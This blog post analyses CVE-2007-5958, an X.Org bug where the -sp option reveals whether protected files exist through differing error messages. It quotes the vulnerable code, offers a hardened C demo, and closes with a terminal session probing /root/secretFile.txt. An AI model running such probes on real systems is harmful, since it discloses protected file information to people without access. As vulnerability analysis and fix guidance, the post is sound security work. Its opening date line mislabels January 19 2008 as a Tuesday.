xorl %eax, %eax

CVE-2007-5958: X.Org File Existence Disclosure


On Tuesday January 19 2008, Matthieu Herrb posted a security advisory on various mailing lists for multiple vulnerabilities that had been found in the X.Org server. One of the disclosed vulnerabilities was the following:

X.Org Xserver before 1.4.1 allows local users to determine the existence of arbitrary files via a filename argument in the -sp option to the X program, which produces different error messages depending on whether the filename exists.

The bug behind this file disclosure is in Xext/security.c, in the function SecurityLoadPropertyAccessList(), which starts at line 1555.

static void
SecurityLoadPropertyAccessList(void)
{
    FILE *f;
    int lineNumber = 0;

    SecurityMaxPropertyName = 0;

    if (!SecurityPolicyFile)
        return;

    f = fopen(SecurityPolicyFile, "r");
    if (!f)
    {
        ErrorF("error opening security policy file %s\n",
               SecurityPolicyFile);
        return;
    }
        ...
        /* if first line, check version number */
        if (lineNumber == 1)
        {
            char *v = SecurityParseString(&p);
            if (strcmp(v, SECURITY_POLICY_FILE_VERSION) != 0)
            {
                ErrorF("%s: invalid security policy file version, ignoring file\n",
                       SecurityPolicyFile);
                break;
            }
            validLine = TRUE;
        }

Now you should see how this can be turned into a file existence disclosure. If the function above cannot open the file, which for a server running with elevated privileges means the file is not present, it prints “error opening security policy file”; if it could open the file but the first line does not carry the expected version string, it prints “invalid security policy file version”. Because the server opens the file with its own privileges rather than the invoking user's, this difference can be used to check for files in directories that we have no read permission on.
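The whole bug is that the error message depends on whether fopen() succeeded, so the defensive fix is to stop the message from carrying that information. The following C program is an added example written for this post, not X.Org's code and not its actual fix: check_policy() mirrors the two failure modes of the excerpt, policy_message_leaky() reports them the way the excerpt does, and policy_message_hardened() collapses both into a single message while keeping the real reason in a status value intended for a privileged log only. The paths under /tmp, the sample file contents and the version string "version-1" are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Constructed for the demo; the macro name is X.Org's, the value is ours. */
#define SECURITY_POLICY_FILE_VERSION "version-1"

/* Reason a policy load failed. Kept as a value, not a message, so it can go
 * to a privileged log without ever reaching the unprivileged invoker. */
typedef enum { POLICY_OK, POLICY_CANNOT_OPEN, POLICY_BAD_VERSION } policy_status;

/* Same two checks as the excerpt: can we open it, and is line 1 the version. */
static policy_status check_policy(const char *path)
{
    char first[128];
    FILE *f = fopen(path, "r");
    if (!f)
        return POLICY_CANNOT_OPEN;
    if (!fgets(first, sizeof first, f)) {
        fclose(f);
        return POLICY_BAD_VERSION;
    }
    fclose(f);
    first[strcspn(first, "\r\n")] = '\0';
    return strcmp(first, SECURITY_POLICY_FILE_VERSION) == 0 ? POLICY_OK
                                                            : POLICY_BAD_VERSION;
}

/* Leaky reporting, modelled on the excerpt: the text differs depending on
 * whether fopen() succeeded, so it tells a caller whether the path exists. */
const char *policy_message_leaky(const char *path)
{
    switch (check_policy(path)) {
    case POLICY_CANNOT_OPEN:
        return "error opening security policy file";
    case POLICY_BAD_VERSION:
        return "invalid security policy file version, ignoring file";
    default:
        return "ok";
    }
}

/* Hardened reporting: every failure collapses to one message. The detail is
 * handed back through *why for a privileged log, never echoed to the user. */
const char *policy_message_hardened(const char *path, policy_status *why)
{
    policy_status s = check_policy(path);
    if (why)
        *why = s;
    return s == POLICY_OK ? "ok" : "security policy file not loaded";
}

/* Demo helper: writes a constructed sample file; returns 1 on success. */
int write_sample(const char *path, const char *content)
{
    FILE *f = fopen(path, "w");
    if (!f)
        return 0;
    fputs(content, f);
    return fclose(f) == 0;
}

int main(void)
{
    const char *good = "/tmp/policy_demo_good.txt";   /* valid version line */
    const char *junk = "/tmp/policy_demo_junk.txt";   /* exists, wrong version */
    const char *none = "/tmp/policy_demo_absent.txt"; /* never created */
    const char *paths[] = { good, junk, none };

    write_sample(good, SECURITY_POLICY_FILE_VERSION "\n");
    write_sample(junk, "this is not a policy file\n");

    for (int i = 0; i < 3; i++)
        printf("%-30s leaky: %-53s hardened: %s\n", paths[i],
               policy_message_leaky(paths[i]),
               policy_message_hardened(paths[i], NULL));

    remove(good);
    remove(junk);
    return 0;
}
```

Compile with cc -std=c99 and run: the leaky column differs between the junk file and the absent file, the hardened column does not. Collapsing messages is only half of the general fix for a privileged program that takes a user-supplied path; the other half is not opening the file with more privilege than the invoker has (dropping privileges first, or refusing the option when running setuid), since the open result can still leak through timing or other side channels.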

This is an X.Org vulnerability, so it applies regardless of the underlying operating system; vulnerable versions of X.Org ship in the default installation of numerous operating systems, such as Ubuntu up to 7.10, SCO UnixWare up to 7.1.4, Sun Solaris up to 10, OpenBSD up to 4.2, Red Hat Enterprise up to 5, Apple Mac OS X up to 10.5.2, etc. I had a spare test box with Ubuntu 6.10 Edgy Eft installed, so here is a sample test of this bug:

xorl@ubuntu:~$ uname -a
Linux ubuntu 2.6.17-10-generic #2 SMP Fri Oct 13 18:45:35 UTC 2006 i686 GNU/Linux
xorl@ubuntu:~$ ls /root/secretFile.txt
ls: /root/secretFile.txt: Permission denied

xorl@ubuntu:~$ X :1 -sp /root/secretFile.txt | grep secretFile
secretFile.txt: invalid security policy file version, ignoring file
xorl@ubuntu:~$

Of course you can automate this with a simple ten-line shell script, but I don’t find it particularly useful.

Written by xorl

January 2, 2009 at 22:58

Posted in bugs
